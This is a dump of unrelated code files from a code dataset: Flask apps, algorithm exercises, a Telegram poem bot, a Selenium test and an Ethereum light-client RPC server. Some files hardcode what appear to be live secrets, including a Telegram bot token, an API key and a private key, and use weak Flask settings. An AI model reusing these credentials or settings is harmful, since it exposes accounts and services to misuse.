#data_matrix = data.to_records()\n #print(data_matrix)\n #print(data_matrix.tolist())\n #js = {}\n #for i in data_matrix.tolist():\n # js[i[1]] = i[2]\n\n #print(jsonify(js))\n #print(json.dumps(js))\n return jsonify(data)\n\nif __name__ == '__main__':\n app.run()\n ","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"297585550","text":"# Created by Aashish Adhikari at 10:00 AM 1/15/2021\n\n'''\nTime Complexity:\nO(n) since we traverse to each node once.\n\nSpace Complexity:\nO(height of the tree) as we are maintaining a recursive stack under the hood.\n'''\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n\n def helper(self, node, current_sum):\n\n\n\n # base case\n if node.left is None and node.right is None:\n self.total += ((current_sum* 10) + node.val)\n\n if node.left is not None:\n self.helper(node.left, (current_sum* 10) + node.val)\n\n if node.right is not None:\n self.helper(node.right, (current_sum* 10) + node.val)\n\n def sumNumbers(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n\n if root is None:\n return 0\n\n self.total = 0\n\n self.helper(root, self.total)\n\n return self.total","sub_path":"Sum_Root_to_Leaf_Numbers_Recursive_with_No_DeepCopy.py","file_name":"Sum_Root_to_Leaf_Numbers_Recursive_with_No_DeepCopy.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"133986900","text":"#Given a compressed string of the form \"3[ab2[c]]\" return the decompressed string: \"abccabccabcc\"\n# O(n)\n\n\ndef decompress(s):\n \n if (len(s) == 0): \n return \"\"\n else:\n rStr = ''\n sStr = ''\n n = '' \n inner = []\n for each in s:\n if (ord(each) in range (65,91) or ord(each) in range (97,123)): # is an alphabet\n rStr = rStr+each\n if ord(each) in range (48,58): # get the count before the bracket\n n = n + each\n if (each=='['):\n inner = s[s.index(each)+1:-1] #inner will be everything within the square brackets\n #inner.append(s[s.index(each)+1])\n i = 0\n \n while(i0:\n answer = answer + decompress(''.join(l))\n l = []\n brackets = [];\n prevbracket =''\n currentbracket = ''\n n = 0\n m = 0\n \n answer = answer + decompress(''.join(l))\n return answer\n\n'''\ndef splitStr(lStr):\n tempList = []\n tempList = lStr.split('.')\n answer = ''\n for each in tempList:\n answer = answer + decompress(each)\n return answer\n''' \n \n \n\n#print(splitStr(tokenise('z3[a2[b]]2[a]'))) \n\nprint(decompress(\"z3[a2[b]]rty3[ab]\"))\nprint(decompress(\"z1[a]\"))\nprint(decompress(\"zab\"))\nprint(decompress(\"2[2[zab]3[rtu]]\"))\nprint(len(decompress('0[a2[b]]')))\nprint('z3[a2[b]].2[a].'.split('.'))\n'''\nprint (tokenise('2z3[a2[b]]'))\nprint (tokenise(''))\nprint (tokenise('ab'))\nprint (tokenise('3[s]'))\nprint (tokenise(\"3[a]2[bc]\")) # return \"aaabcbc\".\nprint (tokenise(\"3[a2[c]]\")) # return \"accaccacc\".\nprint (tokenise(\"2[abc]3[cd]ef\")) # return \"abcabccdcdcdef\".\nprint (tokenise(\"2[abc4[ed4[u]]]3[cd]ef\"))\nprint (tokenise(\"zxdsef\"))\nprint (tokenise(\"zxd9[i2[jh]]sef\"))\n'''\n#print (tokenise(\"zxd9000[i2[jh]]sef\"))\n","sub_path":"python/Ghain/decompress.py","file_name":"decompress.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"529407054","text":"from flask import Flask, request,redirect,url_for, jsonify,render_template,session\nfrom flask_mysqldb import MySQL\n\n\nimport numpy as np\nimport pickle\nfrom bs4 import BeautifulSoup\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem.wordnet import WordNetLemmatizer\n\n\ndef removeHTMLTags(sentences):\n soup = BeautifulSoup(sentences, 'lxml')\n return soup.get_text()\n\ndef removeApostrophe(sentences):\n phrase = re.sub(r\"won't\", \"will not\", sentences)\n phrase = re.sub(r\"can\\'t\", \"can not\", sentences)\n phrase = re.sub(r\"n\\'t\", \" not\", sentences)\n phrase = re.sub(r\"\\'re\", \" are\", sentences)\n phrase = re.sub(r\"\\'s\", \" is\", sentences)\n phrase = re.sub(r\"\\'d\", \" would\", sentences)\n phrase = re.sub(r\"\\'ll\", \" will\", sentences)\n phrase = re.sub(r\"\\'t\", \" not\", sentences)\n phrase = re.sub(r\"\\'ve\", \" have\", sentences)\n phrase = re.sub(r\"\\'m\", \" am\", sentences)\n return phrase\n\ndef removeAlphaNumericWords(sentences):\n return re.sub(\"\\S*\\d\\S*\", \"\", sentences).strip()\n\ndef removeSpecialChars(sentences):\n return re.sub('[^a-zA-Z]', ' ', sentences)\n\ndef doTextCleaning(sentences):\n sentences = removeHTMLTags(sentences)\n sentences = removeApostrophe(sentences)\n sentences = removeAlphaNumericWords(sentences)\n sentences = removeSpecialChars(sentences) \n # Lower casing\n sentences = sentences.lower() \n #Tokenization\n sentences = sentences.split()\n #Removing Stopwords and Lemmatization\n lmtzr = WordNetLemmatizer()\n sentences = [lmtzr.lemmatize(word, 'v') for word in sentences if not word in set(stopwords.words('english'))]\n sentences = \" \".join(sentences) \n return sentences\n\napp = Flask(__name__)\napp.secret_key = \"kalai\" \n\n#DB connection:\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = ''\napp.config['MYSQL_DB'] = 'nlp'\n\nmysql = MySQL(app)\n\n\nmodel = pickle.load(open('GNmodel.pkl','rb'))\nvectorizer = pickle.load(open('supervectorizer.pkl','rb'))\n\n@app.route('/')\ndef index():\n cur = mysql.connection.cursor()\n cur.execute(\"SELECT * FROM comments\")\n data=cur.fetchall()\n cur.execute(\"SELECT count(*) FROM comments WHERE type=1\")\n t1=cur.fetchone()[0]\n cur.execute(\"SELECT count(*) FROM comments WHERE type=0\")\n t0=cur.fetchone()[0]\n cur.close()\n return render_template('index.html',data=data,text=[t0,t1])\n\n\n@app.route('/predict',methods=['POST'])\ndef predict():\n sentence=request.form['textData']\n normaltext=request.form['textData']\n #print(sentence)\n sentence = doTextCleaning(sentence)\n sentence = vectorizer.transform([sentence]).toarray() \n prediction = model.predict(sentence)\n output = prediction[0]\n session['output']=str(output)\n \n #insert into comments table.\n cur = mysql.connection.cursor()\n cur.execute(\"INSERT INTO comments(comment,type) VALUES (%s, %s)\", (normaltext, str(output)))\n mysql.connection.commit()\n cur.close()\n \n return redirect(url_for('index'))\n \n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"41357202","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n\nseries = pd.read_csv('Digkilaan_trimmed.csv')\nseries['date_and_time'] = series['YEAR'].map(str) + '-'+ series['MONTH'].map(str) + '-'+ series['DAY'].map(str) + ' ' + series['TIME'].map(str)\n\n\ndate_and_time = series['date_and_time'].tolist()\nrainfall = series['RAINFALL']\nwaterlevel = rainfall\nwaterlevel = waterlevel.tolist()\n\nvalues = waterlevel\ntimestamps = pd.to_datetime(date_and_time)\n\nts = pd.Series(values, index=timestamps)\nts = ts.resample('15T').mean()\n\nts.interpolate(method='spline', order=3).plot()\nts.interpolate(method='time').plot()\nts.interpolate(method='linear', inplace=True)\n\n\nprint(str(ts))\nts.columns = ['DATETIME', 'RAINFALL']\nts.to_csv('Digkilaan_interpol.csv')\nlines, labels = plt.gca().get_legend_handles_labels()\nlabels = ['spline', 'time']\nplt.legend(lines, labels, loc='best')\nplt.show()\n\n\n","sub_path":"Scripts_Arch2_nfs/rainfall_interpolation.py","file_name":"rainfall_interpolation.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"394027630","text":"import telebot\nimport socks, time\nfrom BotPoem import get_poem\nimport socks, requests\nfrom telebot import apihelper\n\n\nproxyDict = {\n \"http\": \"socks5h://34.84.57.254:22080\",\n \"https\": \"socks5h://34.84.57.254:22080\"\n}\n\ndef bot_():\n global proxyDict\n apihelper.proxy = proxyDict\n bot = telebot.TeleBot('')\n\n @bot.message_handler(commands=['start'])\n def start_message(message):\n bot.send_message(message.chat.id, 'дорова, ебеныть), я умею писать стихи, напиши расскажи стишок или что-то подобное и я поделюсь с тобой своим творением, божьим словом так сказать')\n\n @bot.message_handler(content_types=[\"photo\"])\n def send_photo(message):\n\n id_ = message.photo[-1].file_id\n path = bot.get_file(id_)\n print(path)\n download_file = bot.download_file(file_path=path.file_path)\n print(download_file)\n #request = requests.get(f\"https://api.telegram.org/file/bot832044201:AAHjNFU5hV9xSpl7bqbn3CC3yIGDSzyFbHQ/{path}\", proxies=proxyDict)\n @bot.message_handler(content_types=['text'])\n def send_text(message):\n\n if \"расс\" in message.text.lower() or \"поведай\" in message.text.lower() or 'еще' in message.text.lower() or \"ещё\" in message.text.lower():\n poem = \"\"\"\"\"\"\n for sentence in get_poem():\n poem += sentence\n print(poem)\n bot.send_message(message.chat.id, poem)\n\n bot.polling(timeout=123)\n\n\nbot_()\n","sub_path":"new_main.py","file_name":"new_main.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"66502356","text":"class Movie:\r\n \"\"\"The Movie Class.\r\n\r\n Defines the information of a movie\r\n\r\n Attributes:\r\n name: The movie title\r\n image: The movie poster\r\n trailer: A link to The movie trailer\r\n box_art: An optional variable for a box art image of the movie\r\n \"\"\"\r\n \r\n def __init__(self, name, image, trailer, box_art=None):\r\n if box_art is not None:\r\n self.name = name\r\n self.box_art = box_art\r\n self.image = image\r\n self.trailer = trailer\r\n else:\r\n self.name = name\r\n self.image = image\r\n self.trailer = trailer\r\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"398892855","text":"import requests\nimport json\n\n\n# Author : Kunal Anand\n# The code is successfully returning containment zones in a given radius to a given location\n\ndef getContainmentLocations(latitude, longitude, radius):\n print('In function')\n\n url = 'https://data.geoiq.io/dataapis/v1.0/covid/nearbyzones'\n\n headers = {'Content-Type': 'application/json'}\n\n payload = {\n\n 'key': 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJtYWlsSWRlbnRpdHkiOiJzYW5hdGhyYW1lc2g1NUBnbWFpbC5jb20ifQ'\n '.eg7KCzdygU7dp9Rp7PJlVd9AAthaQvn0ROBEn0z3jWk',\n\n 'lng': longitude,\n\n 'lat': latitude,\n\n 'radius': radius\n\n }\n\n print(payload[\"lat\"], payload[\"lng\"])\n\n resp = requests.post(url=url, headers=headers, data=json.dumps(payload))\n\n result = json.loads(resp.content)\n\n print(result)\n\n return result\n\n\ndef handleContainmentrequests(root, tablepath, longitude, latitude, distance):\n response = getContainmentLocations(latitude, longitude, distance)\n\n root.child(tablepath).push(response)\n\n\n# print(getContainmentLocations(26.91561, 75.76125, 5000))\n","sub_path":"Server/code/NearbyContainmentRequestHandler.py","file_name":"NearbyContainmentRequestHandler.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"53764855","text":"\"\"\"\nThis folder contains archived practice scripts from Mr. Gabiste Akoua's Udemy course:\n\"Selenium WebDriver with Python - Basics to Intermediate\"\nWhich can be found in below link:\nhttps://www.udemy.com/selenium-webdriver-with-python/#/\nCourse covered a wide range of features, highly recommended.\n\"\"\"\nfrom selenium import webdriver \nfrom selenium.webdriver.support.ui import WebDriverWait \nfrom selenium.webdriver.common.by import By \nfrom selenium.webdriver.common.action_chains import ActionChains \nfrom selenium.webdriver.common.keys import Keys \nimport unittest \nimport time \n\nclass selectOption(unittest.TestCase):\n\n def setUp(self):\n global driver \n driver = webdriver.Firefox() \n driver.get(\"http://travelingtony.weebly.com/store/p1/Leatherback_Turtle_Picture.html\")\n driver.maximize_window() \n\n def test_DropdownArrowDown(self):\n ## Locators \n dropDownID = \".//*[@id='wsite-com-product-option-Quantity']\"\n dropDownElement = WebDriverWait(driver, 10).\\\n until(lambda driver: driver.find_element_by_xpath(dropDownID))\n\n ## Actions \n actions = ActionChains(driver)\n actions.send_keys_to_element(dropDownElement, Keys.ENTER)\n actions.send_keys(Keys.ARROW_DOWN)\n actions.send_keys(Keys.ARROW_DOWN)\n actions.perform()\n ## Adding time.sleep() to allow user to see last webdriver action; use in tests otherwise not recommended\n time.sleep(10)\n\n def tearDown(self):\n driver.quit() \n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"selectOption.py","file_name":"selectOption.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"573432499","text":"#!/usr/bin/python\n############################################################\n####\tAnalyzing peak distribution of rotational\t########\n####\t\t\toscillation spectra\t\t\t\t\t########\n####\t\t\t\t\t\t\t\t\t\t\t\t########\n####\tauthor: Umut Elicabuk\t\t\t\t\t\t########\n####\tdate: 11/05/2017\t\t\t\t\t\t\t########\n####\t\t\t\t\t\t\t\t\t\t\t\t########\n############################################################\n\nfrom __future__ import division, print_function\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.signal import find_peaks_cwt\nimport os.path\nimport peakutils\nfrom scipy.optimize import curve_fit\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport matplotlib.pyplot as plt\n\n#saves figures into one multipage pdf\ndef multipage(filename, figs=None, dpi=200):\n pp = PdfPages(filename)\n if figs is None:\n figs = [plt.figure(n) for n in plt.get_fignums()]\n for fig in figs:\n fig.savefig(pp, format='pdf')\n pp.close()\n\n#shell\nif len(sys.argv) != 3:\n\tquit('Usage: .//analyze.py ')\n\nif not os.path.isfile(sys.argv[2]):\n\tquit('The specified file does not exist.')\n\n#load data\nX, Y = np.loadtxt(sys.argv[2], unpack=True)\n\n#plot data\nfig1 = plt.figure()\nplt.plot(X, Y, linewidth=0.1)\nplt.xlabel(r'wavenumber in $cm^{-1}$')\nplt.ylabel('optical density')\nplt.grid()\n\n#peak detection (Yeah, I probably should have filtered before.\n#\t\t\t\tThen again: it's just a worksheet.)\nindexes\t= peakutils.indexes(Y, thres=0.02/max(Y), min_dist=55)\n\n#mark peaks\nplt.plot(X[indexes], Y[indexes], ls='', marker='o', markersize=2, color=\"red\")\n\n#find index of lowest peak\nwmin=10\nargmin = 0\n\nindexes = indexes[5:-3] #first and last few peaks are just noise, cut those off, f*** the police\n\nfor i in indexes:\n\tif Y[i] < wmin:\n\t\twmin = Y[i]\n\t\targmin = i\n\n#mark lowest peak\nplt.plot(X[argmin], Y[argmin], marker='o', markersize=2, color='xkcd:teal')\n\n#print lowest wavenumber\nprint('omega_0 =%.2f' %X[argmin], '\\n')\n\n#print p-branch\nj=1\nprint('p-branch:\\nwaveno.[cm^-1]\\tj0\\tj1')\nfor i in indexes:\n\tif X[i] < X[argmin]:\n\t\tprint('%.2f\\t\\t%i\\t%i' %(X[i], j, j-1))\n\t\tj=j+1\n\n#print r-branch\nj=0\nprint('\\nr-branch:\\nwaveno.[cm^-1]\\tj0\\tj1')\nfor i in indexes:\n\tif X[i] > X[argmin]:\n\t\tprint('%.2f\\t\\t%i\\t%i' %(X[i], j, j+1))\n\t\tj=j+1\n\n#prepare peak diffs\n#slice indexes (comparing to output of procedure above to find indexes)\nindexes_p = indexes[:12]\t#TODO: Remove hard-coded shit.\nindexes_r = indexes[13:]\t#TODO: Remove hard-coded shit.\ndiff_p = np.zeros(indexes_p.size-1)\ndiff_r = np.zeros(indexes_r.size-1)\n\n#calculate diffs\nfor i in range(0, len(indexes_p)-1):\n\tdiff_p[i]=X[indexes_p[i+1]]-X[indexes_p[i]]\nfor i in range(0, len(indexes_r)-1):\n\tdiff_r[i]=X[indexes_r[i+1]]-X[indexes_r[i]]\n\nprint('\\ndiffs of p-branch:\\n', diff_p, '\\n')\nprint('\\ndiffs of r-branch:\\n', diff_r, '\\n')\n\n#fit\ndef pbranch(j, B0, B1):\n\treturn 2*B0 + 2*(B0-B1)*j\n\ndef rbranch(j, B0, B1):\n\treturn 2*(2*B1-B0)+2*(B1-B0)*j\n\nX_p = np.arange(0, len(indexes_p)-1, 1)\nX_r = np.arange(0, len(indexes_r)-1, 1)\n\npoptp, pcovp = curve_fit(pbranch, X_p, diff_p)\npoptr, pcovr = curve_fit(rbranch, X_r, diff_r)\n\nfig2 = plt.figure()\nplt.plot(X_p, pbranch(X_p, poptp[0], poptp[1]), label='p-branch')\nplt.plot(X_r, rbranch(X_r, poptr[0], poptr[1]), label='r-branch')\nplt.xlabel(r'quantum number $j_0$')\nplt.ylabel(r'$\\Delta\\omega$ in $cm^{-1}$')\nplt.grid()\nplt.legend()\n\nprint('p-branch: B0 = %.2f,\\tB1 = %.2f' %(poptp[0], poptp[1]))\nprint('r-branch: B0 = %.2f,\\tB1 = %.2f' %(poptr[0], poptr[1]))\n\n#shell\nif sys.argv[1].lower() == 'show':\n\tplt.show()\nelif sys.argv[1].lower() == 'save':\n\tmultipage('output.pdf')\nelse:\n\tquit('Usage: .//analyze.py !>>> <<')\n","sub_path":"rotationalspectrum/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"7949963","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.views import View\nfrom twitter.models import (Tweet, Message)\nfrom twitter.forms import (TweetForm, MessageRespondForm)\n\n\n# Create your views here.\n\nclass Homepage(View):\n def get(self, request):\n form = TweetForm()\n tweets = Tweet.objects.all()\n return render(request, 'homepage.html', {'form': form, 'tweets': tweets})\n\n def post(self, request):\n form = TweetForm(request.POST)\n if form.is_valid():\n content = form.cleaned_data['content']\n tweet = Tweet.objects.create(content=content, user=request.user)\n return redirect('Homepage')\n\n\nclass Profile(View):\n def get(self, request, user_id=None):\n if user_id is None:\n user_id = request.user.id\n try:\n user = User.objects.get(pk=user_id)\n except ObjectDoesNotExist:\n return redirect('Profile')\n user_tweets = Tweet.objects.filter(user__username=user.username)\n return render(request, 'profile.html', {'user': user, 'user_tweets': user_tweets})\n\n\nclass MessagesReceived(View):\n def get(self, request, from_id=0):\n respond_form = MessageRespondForm()\n user_id = request.user.id\n messages = Message.objects.filter(to_user=user_id).order_by('creation_date')\n sent = Message.objects.filter(from_user=user_id).order_by('creation_date')\n last = messages.last()\n try:\n message_details = Message.objects.get(pk=from_id)\n message_details.seen = True\n message_details.save()\n except ObjectDoesNotExist:\n return render(request, 'messages.html',\n {'messages': messages, 'sent': sent, 'message_details': last, 'respond_form': respond_form})\n test_sender = Message.objects.get(pk=from_id).to_user.get_queryset().first()\n test_receiver = Message.objects.get(pk=from_id).from_user.get_queryset().first()\n if test_sender == request.user or test_receiver == request.user:\n return render(request, 'messages.html',\n {'messages': messages, 'sent': sent, 'message_details': message_details,\n 'respond_form': respond_form})\n else:\n return render(request, 'messages.html',\n {'messages': messages, 'sent': sent, 'message_details': last, 'respond_form': respond_form})\n\n\nclass MessagesSent(View):\n pass\n","sub_path":"twitter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"475765425","text":"import pyperclip\n\ntext = pyperclip.paste()\n\n#To do: seperate lines and add star\nlines = text.split('\\n')\nfor i in range(len(lines)):\n lines[i] = '* ' + lines[i]\ntext = '\\n'.join(lines)\n\n#Make the text to uppercase.\n#text = text.upper()\n\npyperclip.copy(text)\n","sub_path":"Automate_boring_stuff/bulletPointAdder.py","file_name":"bulletPointAdder.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"498123636","text":"\"\"\"\nA simple JSON-RPC server that only responds to eth_getBlockByNumber and eth_getBlockByHash\ncalls. It uses the LightChain to sync headers as they're announced and fetches blocks on demand\nas RPC calls ask for them.\n\"\"\"\nimport asyncio\nimport logging\n\nimport rlp\n\nfrom aiohttp import web\nfrom aiohttp.web_exceptions import HTTPMethodNotAllowed\n\nfrom eth_utils import decode_hex, encode_hex\n\nfrom eth_keys import keys\n\nfrom evm.chains.mainnet import MAINNET_VM_CONFIGURATION\nfrom evm.chains.ropsten import (\n ROPSTEN_GENESIS_HEADER,\n ROPSTEN_NETWORK_ID,\n)\nfrom evm.p2p import ecies\nfrom evm.p2p import kademlia\nfrom evm.p2p.constants import HANDSHAKE_TIMEOUT\nfrom evm.p2p.lightchain import (\n LightChain,\n OnDemandDataBackend,\n)\nfrom evm.p2p.peer import (\n handshake,\n LESPeer,\n)\nfrom evm.utils.numeric import int_to_big_endian\n\n\n# Change the values below to connect to a node on a different network or IP address.\nGENESIS_HEADER = ROPSTEN_GENESIS_HEADER\nNETWORK_ID = ROPSTEN_NETWORK_ID\n# The pubkey for the local node we'll connect to. Simply pass the hex string below to\n# geth using the \"-nodekeyhex\" argument.\nNODE_ID = keys.PrivateKey(decode_hex(\n \"45a915e4d060149eb4365960e6a7a45f334393093061116b197e3240065ff2d8\")).public_key\nNODE_ADDR = kademlia.Address('127.0.0.1', 30303, 30303)\n\n\nclass App(web.Application):\n allowed_methods = ['eth_getBlockByNumber', 'eth_getBlockByHash']\n\n def __init__(self, chain):\n super(App, self).__init__()\n self.chain = chain\n self.router.add_post('/', self.handle)\n self.on_startup.append(self.connect_peer)\n self.on_shutdown.append(self.stop_chain)\n\n @asyncio.coroutine\n def handle(self, request):\n body = yield from request.json()\n req_id = body['id']\n method = body['method']\n hash_or_number, _ = body['params']\n if method == 'eth_getBlockByNumber':\n if hash_or_number == \"latest\":\n head = self.chain.get_canonical_head()\n number = head.block_number\n else:\n number = int(hash_or_number, 16)\n block = yield from self.chain.get_canonical_block_by_number(number)\n elif method == 'eth_getBlockByHash':\n block_hash = decode_hex(hash_or_number)\n block = yield from self.chain.get_block_by_hash(block_hash)\n else:\n raise HTTPMethodNotAllowed(method, self.allowed_methods)\n\n block_dict = self._block_to_dict(block)\n response = {\"jsonrpc\": \"2.0\", \"id\": req_id, \"result\": block_dict}\n return web.json_response(response)\n\n @asyncio.coroutine\n def connect_peer(self, app):\n return self.chain.on_demand_data_backend.get_peer()\n\n @asyncio.coroutine\n def stop_chain(self, app):\n return self.chain.stop()\n\n def _block_to_dict(self, block):\n logs_bloom = encode_hex(int_to_big_endian(block.header.bloom))[2:]\n logs_bloom = '0x' + logs_bloom.rjust(512, '0')\n return {\n \"difficulty\": hex(block.header.difficulty),\n \"extraData\": encode_hex(block.header.extra_data),\n \"gasLimit\": hex(block.header.gas_limit),\n \"gasUsed\": hex(block.header.gas_used),\n \"hash\": encode_hex(block.header.hash),\n \"logsBloom\": logs_bloom,\n \"mixHash\": encode_hex(block.header.mix_hash),\n \"nonce\": encode_hex(block.header.nonce),\n \"number\": hex(block.header.block_number),\n \"parentHash\": encode_hex(block.header.parent_hash),\n \"receiptsRoot\": encode_hex(block.header.receipt_root),\n \"sha3Uncles\": encode_hex(block.header.uncles_hash),\n \"stateRoot\": encode_hex(block.header.state_root),\n \"timestamp\": hex(block.header.timestamp),\n \"totalDifficulty\": hex(self.chain.chaindb.get_score(block.hash)),\n \"transactions\": [encode_hex(tx.hash) for tx in block.transactions],\n \"transactionsRoot\": encode_hex(block.header.transaction_root),\n \"uncles\": [encode_hex(uncle.hash) for uncle in block.uncles],\n \"size\": hex(len(rlp.encode(block))),\n \"miner\": encode_hex(block.header.coinbase),\n }\n\n\nclass SinglePeerOnDemandDataBackend(OnDemandDataBackend):\n\n def __init__(self, chaindb):\n self.chaindb = chaindb\n self.privkey = ecies.generate_privkey()\n self._peer = None\n\n @asyncio.coroutine\n def get_peer(self):\n remote = kademlia.Node(NODE_ID, NODE_ADDR)\n if self._peer is None or self._peer.is_finished:\n self._peer = yield from asyncio.wait_for(\n handshake(remote, self.privkey, LESPeer, self.chaindb, NETWORK_ID),\n HANDSHAKE_TIMEOUT)\n asyncio.ensure_future(self._peer.start())\n return self._peer\n\n @asyncio.coroutine\n def stop(self):\n if self._peer is not None and not self._peer.is_finished:\n yield from self._peer.stop()\n\n\nDemoLightChain = LightChain.configure(\n 'RPCDemoLightChain',\n vm_configuration=MAINNET_VM_CONFIGURATION,\n on_demand_data_backend_class=SinglePeerOnDemandDataBackend,\n network_id=NETWORK_ID,\n)\n\n\nif __name__ == '__main__':\n import argparse\n from evm.db.backends.level import LevelDB\n from evm.db.chain import BaseChainDB\n from evm.exceptions import CanonicalHeadNotFound\n logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-db', type=str, required=True)\n args = parser.parse_args()\n\n chaindb = BaseChainDB(LevelDB(args.db))\n try:\n chaindb.get_canonical_head()\n except CanonicalHeadNotFound:\n # We're starting with a fresh DB.\n chain = DemoLightChain.from_genesis_header(chaindb, GENESIS_HEADER)\n else:\n # We're reusing an existing db.\n chain = DemoLightChain(chaindb)\n\n app = App(chain)\n web.run_app(app, port=8080)\n","sub_path":"evm/rpc/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"439308371","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of Invenio.\n# Copyright (C) 2016-2021 CERN.\n#\n# Invenio is free software; you can redistribute it and/or modify it\n# under the terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"Invenio Communities Service API.\"\"\"\n\nfrom elasticsearch_dsl import Q\nfrom invenio_db import db\nfrom invenio_records_resources.services.base import LinksTemplate\nfrom invenio_records_resources.services.records import RecordService\nfrom marshmallow.exceptions import ValidationError\n\n\nclass CommunityService(RecordService):\n \"\"\"community Service.\"\"\"\n\n def __init__(self, config, files_service=None):\n \"\"\"Constructor for CommunityService.\"\"\"\n super().__init__(config)\n self._files = files_service\n\n @property\n def files(self):\n \"\"\"Community files service.\"\"\"\n return self._files\n\n def search_user_communities(\n self, identity, params=None, es_preference=None, **kwargs):\n \"\"\"Search for records matching the querystring.\"\"\"\n self.require_permission(identity, 'search_user_communities')\n\n # Prepare and execute the search\n params = params or {}\n search_result = self._search(\n 'search',\n identity,\n params,\n es_preference,\n extra_filter=Q(\n \"term\",\n **{\"access.owned_by.user\": identity.id}\n ),\n permission_action='read',\n **kwargs).execute()\n\n return self.result_list(\n self,\n identity,\n search_result,\n params,\n links_tpl=LinksTemplate(self.config.links_user_search, context={\n \"args\": params\n }),\n links_item_tpl=self.links_item_tpl,\n )\n\n def rename(self, id_, identity, data, revision_id=None, raise_errors=True):\n \"\"\"Rename a community.\"\"\"\n record = self.record_cls.pid.resolve(id_)\n\n self.check_revision_id(record, revision_id)\n\n # Permissions\n self.require_permission(identity, \"rename\", record=record)\n\n if 'id' not in data:\n raise ValidationError(\n 'Missing data for required field.',\n field_name='id',\n )\n\n data, errors = self.schema.load(\n data,\n context={\"identity\": identity},\n raise_errors=raise_errors, # if False, flow is continued with\n schema_args={'partial': True} # data only containing valid data,\n # but errors are reported\n ) # (as warnings)\n\n # Run components\n for component in self.components:\n if hasattr(component, 'rename'):\n component.rename(identity, data=data, record=record)\n\n record.commit()\n db.session.commit()\n\n if self.indexer:\n self.indexer.index(record)\n\n return self.result_item(\n self,\n identity,\n record,\n links_tpl=self.links_item_tpl,\n )\n\n def read_logo(self, id_, identity):\n \"\"\"Read the community's logo.\"\"\"\n record = self.record_cls.pid.resolve(id_)\n self.require_permission(identity, 'read', record=record)\n logo_file = record.files.get('logo')\n if logo_file is None:\n raise FileNotFoundError()\n return self.files.file_result_item(\n self.files,\n identity,\n logo_file,\n record,\n links_tpl=self.files.file_links_item_tpl(id_),\n )\n\n def update_logo(self, id_, identity, stream, content_length=None):\n \"\"\"Update the community's logo.\"\"\"\n record = self.record_cls.pid.resolve(id_)\n self.require_permission(identity, 'update', record=record)\n\n record.files['logo'] = stream\n record.commit()\n db.session.commit()\n return self.files.file_result_item(\n self.files,\n identity,\n record.files['logo'],\n record,\n links_tpl=self.files.file_links_item_tpl(id_),\n )\n\n def delete_logo(self, id_, identity):\n \"\"\"Delete the community's logo.\"\"\"\n record = self.record_cls.pid.resolve(id_)\n deleted_file = record.files.pop('logo', None)\n if deleted_file is None:\n raise FileNotFoundError()\n record.commit()\n db.session.commit()\n return self.files.file_result_item(\n self.files,\n identity,\n deleted_file,\n record,\n links_tpl=self.files.file_links_item_tpl(id_),\n )\n","sub_path":"invenio_communities/communities/services/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"163393499","text":"import os, os.path, re\n\nrootDir = '.' # look down from this directory\noutputFile = 'strings.csv' # output table of strings to this file\npattern1 = \"(?P['\"+r'\"`])(?P.*?)(?[A-Za-z\\-]+).*?>(?P.*?)<\\/(?P=tag)>\"\npattern3 = \"@{4}.*?\\?>\"\npattern4 = \"@{4}[^(?>)]*\"\ninString = re.compile(pattern1)\ninTags = re.compile(pattern2, 